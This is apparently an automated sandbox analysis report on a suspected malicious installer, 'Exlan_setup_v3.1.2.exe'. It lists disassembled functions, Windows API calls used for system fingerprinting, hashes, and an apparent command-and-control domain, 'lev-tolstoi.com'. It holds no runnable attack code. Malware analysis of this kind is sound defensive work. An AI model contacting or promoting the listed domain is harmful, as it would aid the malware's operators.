Part of subcall function 6D0090D8: __CxxThrowException@8.LIBCMT ref: 6D009102
Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D009113

_memmove.LIBCMT ref: 6CFB519E

Strings

vector<T> too long, xrefs: 6CFB516E

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: b2d7b7b9d4a4f3f0cb0c2cbac6a551ef5d4dee30b1f9e21059e6d43546c596b6
Instruction ID: 36e720aff9c3901fc38a57296cce83dde26e6006d17b6e6588835de9b259ca30
Opcode Fuzzy Hash: b2d7b7b9d4a4f3f0cb0c2cbac6a551ef5d4dee30b1f9e21059e6d43546c596b6
Instruction Fuzzy Hash: B501A7B16042059FE724CFA9DC9196BB3D8EB54214719452DE85AD3740E735F904CB60

Function 6D013EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6D013ED9
DName::DName.LIBCMT ref: 6D013EE5

Strings

{flat}, xrefs: 6D013ED4

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: dac22decb360cc19f36cc421b59bd9b4194e6a7494c6d6d2abbe5148bdb913b8
Instruction ID: 74f84532fb29919001edb7227e2c440da3517026526bd27ba7f441dfe91bcf29
Opcode Fuzzy Hash: dac22decb360cc19f36cc421b59bd9b4194e6a7494c6d6d2abbe5148bdb913b8
Instruction Fuzzy Hash: F9F06571148245DFEB11DF98C894FB83FE5AB4A795F09C145E95C0F292C731D442C755

Function 6CFB7680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,5A45ABCE), ref: 6CFB76AD
LeaveCriticalSection.KERNEL32(?,?,?,5A45ABCE), ref: 6CFB76FF
EnterCriticalSection.KERNEL32(5A45ABCE,?,?,?,5A45ABCE), ref: 6CFB770D
LeaveCriticalSection.KERNEL32(5A45ABCE,?,00000000,?,?,?,?,5A45ABCE), ref: 6CFB772A

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

Part of subcall function 6CFB6D40: _rand.LIBCMT ref: 6CFB6DEA

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: a52f98e9baaf7d6fb863cfe8e27a3db3d8acc2e329fa2038190db5fe00162e1b
Instruction ID: 6093560a747b85e43eba744c3115272db926e03c67fff5f32bc79b574db9999e
Opcode Fuzzy Hash: a52f98e9baaf7d6fb863cfe8e27a3db3d8acc2e329fa2038190db5fe00162e1b
Instruction Fuzzy Hash: F6218E72904609ABCB10DF65CC84EDFB7BDFF95254F10462AE816A7640EB70AA05CBA0

Function 6CFB9580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6CFB95A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CFB95CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CFB95DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CFB95FB

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 620e284ca979fbb2d056cf35e28ab15dca57c49a3d67ce8363ccd63da88cfefa
Instruction ID: 497bbd0c6c7077165798690dfed8048b5c85d2d7b75605f63fc2234812ed4426
Opcode Fuzzy Hash: 620e284ca979fbb2d056cf35e28ab15dca57c49a3d67ce8363ccd63da88cfefa
Instruction Fuzzy Hash: BE117C32905118AFCB00CF9AE980EDEF7B8FF65214B21419AE515A7A11DB30EA55CBA0

Analysis Process: Exlan_setup_v3.1.2.exePID: 7584, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.7%
Total number of Nodes:	428
Total number of Limit Nodes:	19

Executed Functions

Function 00437920 Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 668
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437BEA
SysAllocString.OLEAUT32(A65AA451), ref: 00437C99
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437CD7
SysAllocString.OLEAUT32(1FCF1DCB), ref: 00437D2F
SysAllocString.OLEAUT32(B7F3B5E7), ref: 00437DF2
VariantInit.OLEAUT32(F8E7E6FD), ref: 00437E5E
VariantClear.OLEAUT32(F8E7E6FD), ref: 00437FB3
SysFreeString.OLEAUT32(83E881E0), ref: 00437FD4
SysFreeString.OLEAUT32(?), ref: 00437FDA
SysFreeString.OLEAUT32(00000000), ref: 00437FE7
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438023

Strings

WH, xrefs: 00437C20
,, xrefs: 00437CED

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: ,$WH
API String ID: 2573436264-672483920
Opcode ID: 90dd88dae34bb1c36ee2274fbaa6166169b0f9a7cb1436d850e182364ef6b759
Instruction ID: b8131d376048d1de33f507f2ef199fbc2364cab3dd5ab2f5b353693958753975
Opcode Fuzzy Hash: 90dd88dae34bb1c36ee2274fbaa6166169b0f9a7cb1436d850e182364ef6b759
Instruction Fuzzy Hash: 3722F0B2A083409FD310CF65C880B5BBBE5EFC9314F18892DF9D59B291D678D806CB96

Function 00423750 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{}, xrefs: 00423BD3
Y?E!, xrefs: 004238BF
V(, xrefs: 00423CE3
W7[9, xrefs: 004238AF
bc, xrefs: 00423BE3
12, xrefs: 00423D1B
Q;]=, xrefs: 004238B7
Z\, xrefs: 00423CCB

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: 12$Q;]=$W7[9$Y?E!$bc$V($Z\${}
API String ID: 0-4271978515
Opcode ID: db491d5053218ac93035e4a4dd364511c008d4155fe3a5d399b7afdc36e6d0a9
Instruction ID: 5f5be08b026242b7902f4f95a66152dcb87cb56f5131dc9cc32c3efbd525e7b6
Opcode Fuzzy Hash: db491d5053218ac93035e4a4dd364511c008d4155fe3a5d399b7afdc36e6d0a9
Instruction Fuzzy Hash: E1F1FCB4608341CFD314DF15E89262FBBF0FB86314F44892DE4869B351E7789A0ACB4A

Function 0042BE6F Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042BF69
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BFA5

Strings

E, xrefs: 0042C41D
F, xrefs: 0042C182
U[QB, xrefs: 0042C234

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: ComputerFreeLibraryName
String ID: E$F$U[QB
API String ID: 2904949787-1973755058
Opcode ID: 1e3a8ec1c3de91a8254089136f7c5c0384ecb2ef652af63b221cceb1ed571dc4
Instruction ID: 97af9a46f7d2642363d35f919e03ee6d4d2c293e8cd48a34c88903b2ba8a5bf2
Opcode Fuzzy Hash: 1e3a8ec1c3de91a8254089136f7c5c0384ecb2ef652af63b221cceb1ed571dc4
Instruction Fuzzy Hash: 27D1ED2060C3E08EE7358F2594507BBBBE19FE7305F58489ED4C99B282D7794805CBAB

Function 0040D780 Relevance: 9.7, APIs: 2, Strings: 4, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040D787
CoUninitialize.COMBASE ref: 0040DAFE

Strings

fgwk, xrefs: 0040DB83
lev-tolstoi.com, xrefs: 0040DAC9, 0040DE37
xctk, xrefs: 0040DB8A
iose, xrefs: 0040DBA6

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: fgwk$iose$lev-tolstoi.com$xctk
API String ID: 3861434553-1381854926
Opcode ID: fad984223f08c6a5ee118f7f7f38b4bc671b294e032ee7c2a8250e07ecb1b93e
Instruction ID: 61b669886d250074ae4873043ec0140415d0adda0e1f1b94f0638055b4c64754
Opcode Fuzzy Hash: fad984223f08c6a5ee118f7f7f38b4bc671b294e032ee7c2a8250e07ecb1b93e
Instruction Fuzzy Hash: 3212EEB45087818FD325CF69C090A62BFE1EF57310B19869DD4D25F7A2C37AE80ACB59

Function 0042BE6A Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BFA5
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C068

Strings

E, xrefs: 0042C41D
F, xrefs: 0042C182
U[QB, xrefs: 0042C234

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: E$F$U[QB
API String ID: 3545744682-1973755058
Opcode ID: f6995aaa1d7fad4cb645ace4ddac252fcfa530ac74a4530e7f99a6d2eaeba955
Instruction ID: 4f94b64e9a77d590c9de78fa95d7839ae57366874f22151074bfb14268a7a23d
Opcode Fuzzy Hash: f6995aaa1d7fad4cb645ace4ddac252fcfa530ac74a4530e7f99a6d2eaeba955
Instruction Fuzzy Hash: FCD1E4216083D18EE735CF2994503BFBBE19F97304F58885ED4C99B382C6799406CBAB

Function 0040A6B0 Relevance: 7.9, Strings: 6, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

AC, xrefs: 0040A76F
UW, xrefs: 0040A797
6=>?, xrefs: 0040A7E7
IK, xrefs: 0040A77F
$(*, xrefs: 0040A6C2
$', xrefs: 0040A8F5

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: $(*$$'$6=>?$AC$IK$UW
API String ID: 0-1247061310
Opcode ID: 73bf84f729117d357b011d91826ec65cca45c87b2fe9034e4083750161826923
Instruction ID: 294fb79fecc304e7a4dd7d686bf31a5b21d5acbbc28518cc6802b02abca1629f
Opcode Fuzzy Hash: 73bf84f729117d357b011d91826ec65cca45c87b2fe9034e4083750161826923
Instruction Fuzzy Hash: FAC14776A4C3508BD324CF65949126BFBE3ABC1304F18893EE9D55B385D6388906CB9B

Function 004085C0 Relevance: 7.6, APIs: 5, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040864A
GetCurrentThreadId.KERNEL32 ref: 00408650
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040865F
GetForegroundWindow.USER32(?,00000010,00000000), ref: 00408665
ExitProcess.KERNEL32 ref: 004086A4

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: e07968b6cbef7b487e4a4fc6ad6350aa8ef8910168257f05520fc6b45c37522c
Instruction ID: 52bfc9392254b839166006af10bd592c88678b2f4476c2af3d76ea57075c0e70
Opcode Fuzzy Hash: e07968b6cbef7b487e4a4fc6ad6350aa8ef8910168257f05520fc6b45c37522c
Instruction Fuzzy Hash: 261136B1E403009FC3243F659D0B75636108B82301F0A823EB9847F3F6DE3D5801859E

Function 00415410 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 913
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

mlkj, xrefs: 004157CE
`a, xrefs: 00415906

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: `a$mlkj
API String ID: 0-1121771792
Opcode ID: 42b4edabb1a14b9f8de978b5272b8db813828a8983c58b60065a132cc1902f53
Instruction ID: 92cdbd27483b11edd39299c247c29ac1b9fa98eb333609832f40ac2cee71af1c
Opcode Fuzzy Hash: 42b4edabb1a14b9f8de978b5272b8db813828a8983c58b60065a132cc1902f53
Instruction Fuzzy Hash: 285224B5908341CBD7209F24D8827EBB7E1FFC5314F18892EE4999B391E7389941CB96

Function 0042C4C9 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CE0C

Strings

pQ, xrefs: 0042CD52
0, xrefs: 0042CECB

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 0$pQ
API String ID: 3960555810-3715682581
Opcode ID: f4c2b27ee3d32251916238168ece91706fb7e06c906c24470055e456e73e4e0d
Instruction ID: 096f2cc577c88638091bb1b7d3953c5e5448ce5a1e8a973b497066695e0d1ff6
Opcode Fuzzy Hash: f4c2b27ee3d32251916238168ece91706fb7e06c906c24470055e456e73e4e0d
Instruction Fuzzy Hash: 92D10571A0C7A08AD739CF29845036FFBE1AFD7304F18896ED4DA9B391D67888058796

Function 00431F70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00431FB2
GetSystemMetrics.USER32 ref: 00431FC2

Strings

, xrefs: 004320AF

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 494d227a92243e4c74d4445c78c6f2de4c82b0e5934df227a6fba6e3f70d9ede
Instruction ID: 332ac377c723e5efcfbed8837d3ebb23e2d970a4e90d695cadef336a33b85b8f
Opcode Fuzzy Hash: 494d227a92243e4c74d4445c78c6f2de4c82b0e5934df227a6fba6e3f70d9ede
Instruction Fuzzy Hash: D7A16BB4409784CFE760DF55D48879AFBF0BB89308F51892EE4998B250C7B9A448CF5B

Function 0040CADF Relevance: 4.1, Strings: 3, Instructions: 308COMMON

Download Yara Rule

Strings

&((r, xrefs: 0040CDA4
lev-tolstoi.com, xrefs: 0040CE42
o&G8, xrefs: 0040CCEA

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: &((r$lev-tolstoi.com$o&G8
API String ID: 0-1520417379
Opcode ID: 85a00fa61690d6a50de2a22064f2bd6e5d7105c655820edc2106002806732283
Instruction ID: 6aa36106fa18f2290ede7ec3c3fc71bb2c4a9ee1773080ee43e1a8dfbde82ee2
Opcode Fuzzy Hash: 85a00fa61690d6a50de2a22064f2bd6e5d7105c655820edc2106002806732283
Instruction Fuzzy Hash: F6A127B16047818FD319CF29C491A62BFF2FF96300B1986ADC0868F7A2C779E845CB54

Function 0040AF1B Relevance: 2.9, Strings: 2, Instructions: 355COMMON

Download Yara Rule

Strings

.j.l, xrefs: 0040B098
9no`, xrefs: 0040B09F

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: .j.l$9no`
API String ID: 0-1499050745
Opcode ID: 82eea0f4ac0b423ac54a6e024ad7b9d056b87d41f617b2d26defb5530711edca
Instruction ID: 8034d0c155776212184672c170d27ab84572874ad7359c5880869bdba963f17f
Opcode Fuzzy Hash: 82eea0f4ac0b423ac54a6e024ad7b9d056b87d41f617b2d26defb5530711edca
Instruction Fuzzy Hash: EFC1A979604B02DFC3248F29EC91B66B7F1FB49305F05893DE59683BA0D738E9068B54

Function 0043F140 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

=<;:, xrefs: 0043F21F
@, xrefs: 0043F201

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: =<;:$@
API String ID: 2994545307-3826605959
Opcode ID: 61dc209654e803cfd6523d6b3bf74c2b2c61b12372a99ee348aa739c46eaf767
Instruction ID: bbfb641fbc6554ecab7c43ab9f61ac6bca927de524e2289b341bcce631ed767b
Opcode Fuzzy Hash: 61dc209654e803cfd6523d6b3bf74c2b2c61b12372a99ee348aa739c46eaf767
Instruction Fuzzy Hash: 3D4157B6E043108BDB14CF29DC4126B76E1FF99318F04853DE8999B3A1E7399D08C78A

Function 004263B0 Relevance: 1.6, Strings: 1, Instructions: 328COMMON

Download Yara Rule

Strings

mlkj, xrefs: 004263D0

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj
API String ID: 2994545307-2192308396
Opcode ID: 6dc3f834fcbf709c033af15d58af61a2611b4de823bfbd2a808c02b1d40041b5
Instruction ID: 7d4cab0d8486c51c17153dea08030cbcf26fdf24ddc9a2534ec8ed4a9827b3f7
Opcode Fuzzy Hash: 6dc3f834fcbf709c033af15d58af61a2611b4de823bfbd2a808c02b1d40041b5
Instruction Fuzzy Hash: 90917D72F043605BD714DE24EC9272BB2A2EF91718F5A813EE88197386F63C9C058799

Function 0043BED0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043EF3B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043BEFE

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040D4B9 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

mlkj, xrefs: 0040D551

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj
API String ID: 2994545307-2192308396
Opcode ID: 8f761d0dffc86a8be3f0b90e670fedd4e3cd98906d3378e7f7025ef530fbf6b7
Instruction ID: 5316a62cb2cf0d3df8c71c85272111258502fd0afb9761e1c74fec3765dc9ba4
Opcode Fuzzy Hash: 8f761d0dffc86a8be3f0b90e670fedd4e3cd98906d3378e7f7025ef530fbf6b7
Instruction Fuzzy Hash: BC51F576B006005BEB19AB369C92B3F7363ABC670CF59403DD546273D3DA39E806C65A

Function 0043F3F0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

=<;:, xrefs: 0043F45E

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: =<;:
API String ID: 2994545307-4106933534
Opcode ID: 0c12f6a9c1e8c147c5af8274ced8ee445b79abe17ac505f2e757c21acfeeca18
Instruction ID: feadbb010ab36657b7fac65e47664c1a4df071a235d8306d7c0f0a365d20cd76
Opcode Fuzzy Hash: 0c12f6a9c1e8c147c5af8274ced8ee445b79abe17ac505f2e757c21acfeeca18
Instruction Fuzzy Hash: 7C419B73F00314ABD7249F65DC81B27B3AAB7ED704F18483EE68557362E2389D088785

Function 0043C4A8 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

_^]\, xrefs: 0043C4F1

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: 5c46d440b111223cb6a38c784d98e84ff97667f3b381455ac92db1f2efee4121
Instruction ID: 360a5a69e222330b2026c47f52e524248e4bcb3eec9ceebdba3c8fed74b3a895
Opcode Fuzzy Hash: 5c46d440b111223cb6a38c784d98e84ff97667f3b381455ac92db1f2efee4121
Instruction Fuzzy Hash: 5F213A3AA41324EBD714CF49CC81F6A7772A789720F299116E512BB395D774AC028BD8

Function 004180B2 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924f53cf301c7de504c4c5928b6f8ee59e1056416231c2e08a45a55035447666
Instruction ID: 7d124fc3cfe799e56513d47e35dde4779cadc6265f7315e3eb8d446c408123dd
Opcode Fuzzy Hash: 924f53cf301c7de504c4c5928b6f8ee59e1056416231c2e08a45a55035447666
Instruction Fuzzy Hash: AFC134729083508BD7258F24C8517EBB7E2FFC5314F09497EE8999B391EB389901C786

Function 0043DDE0 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de3751e8a6455ec2786c6224e8c108f266f9ab2982033819f69e77778adaca23
Instruction ID: 5e7c97e4272296d22a9a684c3af4ddf83f560e2aaa52106fcf22108ca0975e34
Opcode Fuzzy Hash: de3751e8a6455ec2786c6224e8c108f266f9ab2982033819f69e77778adaca23
Instruction Fuzzy Hash: 53818B76A043218BC728AF29DC5163B77A2FFD9310F19D42EE9C68B351EB389D508785

Function 0043A600 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

